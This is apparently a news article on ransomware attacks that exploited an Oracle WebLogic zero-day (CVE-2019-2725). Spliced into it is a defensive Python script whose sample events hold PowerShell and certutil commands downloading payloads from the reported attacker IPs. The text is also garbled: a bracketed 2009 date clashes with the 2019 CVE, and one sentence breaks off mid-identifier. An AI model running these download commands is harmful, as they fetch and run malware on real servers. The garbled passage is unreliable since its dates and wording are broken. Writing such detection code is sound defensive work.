Attackers have been actively exploiting a critical zero-day vulnerability in the widely used Oracle WebLogic server to install ransomware, with no clicking or other interaction required of end users, researchers from Cisco Talos said on Tuesday.
The vulnerability and working exploit code were first made public in China's National Vulnerability Database two weeks ago, researchers from the security education group SANS ISC reported. The vulnerability is easy to exploit and allows attackers to run code of their choice on cloud servers. Because of their performance, bandwidth, and use in high-security cloud environments, these servers are considered high-value targets. The disclosure prompted Oracle to release an emergency patch on Friday. [Tuesday, September 26, 2009] Researchers with Cisco Talos said CVE-201
No interaction required
"Previously, most variants of ransomware required some sort of user interaction. For example, a user opening an attachment to an email message, clicking a malicious link, or running malware on the device," wrote Talos researchers Pierre Cadieux, Colin Grady, Jaeson Schultz, and Matt Valites on Tuesday. "In this case, the attackers simply used the Oracle WebLogic vulnerability, which allowed the affected server to download a copy of the ransomware from the attacker-controlled IP addresses 188.166.74[.]218 and 45.55.211[.]79." The vulnerability is easy to exploit because it requires only HTTP access to a vulnerable WebLogic server. Its Common Vulnerability Scoring System severity rating is 9.8 out of a possible 10. Attackers send a POST request to a vulnerable server containing a PowerShell command that downloads and then executes a malicious file called radm.exe. In addition to PowerShell, attackers exploiting CVE-2019-2725 also use the Certutil command-line tool. Other files that are downloaded and run include office.exe and untitled.exe.
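The chain described above (the WebLogic server process spawning PowerShell or Certutil to fetch and run a payload) is what a host-based detection on the server would look for. The following is an added example, not code from the article or from Talos: a small Python classifier over constructed process-creation events. Only the IP addresses, file names and tool names come from the report; the parent-process check (WebLogic running inside java.exe), the event fields and the sample command lines are assumptions made for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Indicators quoted in the Talos report above (the IPs are written defanged there).
KNOWN_C2_IPS = ("188.166.74.218", "45.55.211.79")
KNOWN_PAYLOADS = ("radm.exe", "office.exe", "untitled.exe")

# Command-line fragments typical of download-and-run via the two tools the report names.
POWERSHELL_DOWNLOAD = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|\biex\b|invoke-expression", re.I)
CERTUTIL_DOWNLOAD = re.compile(r"-urlcache\b.*-f\b", re.I)

@dataclass
class ProcessEvent:
    parent_image: str   # process that spawned the child
    image: str          # the spawned process
    command_line: str

def _basename(path: str) -> str:
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]

def classify(ev: ProcessEvent) -> List[str]:
    """Return every reason an event matches the WebLogic download-and-run chain (empty = benign)."""
    reasons = []
    from_weblogic = _basename(ev.parent_image) in ("java.exe", "java")  # assumption: WebLogic's JVM
    child, cmd = _basename(ev.image), ev.command_line
    if from_weblogic and child == "powershell.exe" and POWERSHELL_DOWNLOAD.search(cmd):
        reasons.append("weblogic spawned powershell download cradle")
    if from_weblogic and child == "certutil.exe" and CERTUTIL_DOWNLOAD.search(cmd):
        reasons.append("weblogic spawned certutil download")
    reasons += [f"known C2 ip {ip}" for ip in KNOWN_C2_IPS if ip in cmd]
    reasons += [f"known payload name {n}" for n in KNOWN_PAYLOADS if n in cmd.lower()]
    return reasons

def scan(events: List[ProcessEvent]) -> List[Tuple[int, List[str]]]:
    """Index and reasons for each event that tripped at least one rule."""
    return [(i, classify(ev)) for i, ev in enumerate(events) if classify(ev)]

# Constructed sample telemetry for this example, not real events.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Oracle\jdk\bin\java.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -nop -w hidden -c (New-Object Net.WebClient).DownloadFile("
                 "'http://188.166.74.218/radm.exe','C:\\Windows\\Temp\\radm.exe')"),
    ProcessEvent(r"C:\Oracle\jdk\bin\java.exe", r"C:\Windows\System32\certutil.exe",
                 "certutil -urlcache -split -f http://45.55.211.79/office.exe office.exe"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell Get-ChildItem C:\\logs"),
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {'; '.join(why)}")
```

The parent-process rule fires even when the indicators are swapped for new ones, which is the point: a web server's JVM launching a download tool is the behaviour to alert on, not the specific IP or file name.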
The ransom note pictured above and below demands $2,500 worth of Bitcoin within two days in exchange for the decryption key that unlocks the encrypted data. After that period, the ransom doubles to $5,000. The attackers provide instructions on how cryptocurrency newcomers can set up a Bitcoin wallet and obtain the digital currency, and they recommend using Blockchain.info.
The attacks combine a high-severity zero-day with software that is widely used in cloud environments. That combination means the attacks are likely to continue. Organizations that use WebLogic should make installing Friday's patch a top priority.